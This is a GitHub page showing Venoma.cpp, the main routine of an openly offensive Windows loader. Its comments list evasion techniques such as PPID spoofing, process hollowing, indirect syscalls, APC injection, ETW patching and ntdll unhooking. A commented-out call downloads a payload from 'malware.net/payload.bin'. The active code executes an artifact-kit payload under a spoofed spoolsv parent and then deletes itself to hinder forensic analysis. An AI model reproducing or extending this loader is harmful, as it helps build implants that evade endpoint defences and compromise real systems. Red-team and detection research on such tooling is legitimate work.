forked from ProcessusT/Venoma
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVenoma.cpp
51 lines (31 loc) · 1.09 KB
/
Venoma.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include <Windows.h>
#include <winhttp.h>
#include <iostream>
#include "Ven.h"
int main()
{
// Compile Time API Hashing
// Run-Time Dynamic Linking
// PPID spoofing
// Process hollowing
// Indirect syscalls execution
// APC execution
// Patching the Event Tracing for Windows (ETW) to prevent detection
// evt_patch();
// Create a fresh copy of the ntdll library from file to unhook functions
// unhooking();
// Get spoolsv PID for PPID spoofing
DWORD pid = GetPID();
// For payload download
// std::vector<BYTE> sh = Download(L"malware.net\0", L"/payload.bin\0");
// For synchronous payload execution with PPID spoofing through process hollowing
//Indirect_RawExec_ppid(pid);
// For APC execution with indirect syscalls
// IndirectAPC();
// For APC execution in a remote process with indirect syscalls
// IndirectRemoteAPC(pid);
// For Artifact kit execution with PPID spoofing through process hollowing
execArtifact(pid);
// For self-deletion to prevent post-compromise analysis
DeleteSelf();
}